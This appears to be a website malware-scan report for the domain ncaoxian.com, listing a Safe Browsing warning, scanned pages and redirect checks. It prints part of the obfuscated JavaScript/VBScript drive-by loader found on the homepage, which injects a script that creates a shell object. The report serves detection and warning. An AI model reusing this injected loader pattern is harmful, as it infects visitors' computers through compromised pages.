Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ncaoxian.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ncaoxian.com/ | 200 OK Content-Length: 14300 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var Words ="%3Cscript%3E%0D%0A%3C%21%2D%2D%0D%0Adocument%2Ewrite%28unescape%28%22%253C%2521doctype%2520html%253E%250A%253Chtml%253E%250A%253Cmeta%2520http%2Dequiv%253D%2522X%2DUA%2DCompatible%2522%2520content%253D%2522IE%253DEmulateIE8%2522%2520%253E%250A%253Chead%253E%250A%253C%2Fhead%253E%250A%253Cbody%253E%250A%250A%253CSCRIPT%2520LANGUAGE%253D%2522VBScript%2522%253E%250A%250Afunction%2520runmumaa%2528%2529%2520%250AOn%2520Error%2520Resume%2520Next%250Aset%2520shell%253Dcre function SetNewWords() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } SetNewWords(); Antivirus reports:
| ||
http://www.ncaoxian.com/static/js/common.js?QN2 | 200 OK Content-Length: 31589 Content-Type: application/x-javascript | clean |
http://www.ncaoxian.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ncaoxian.com
Result:
GET / HTTP/1.1
Host: ncaoxian.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ncaoxian.com
Referer: http://www.google.com/search?q=ncaoxian.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ncaoxian.com
Referer: http://www.google.com/search?q=ncaoxian.com
Result:
The result is similar to the first query. There are no suspicious redirects found.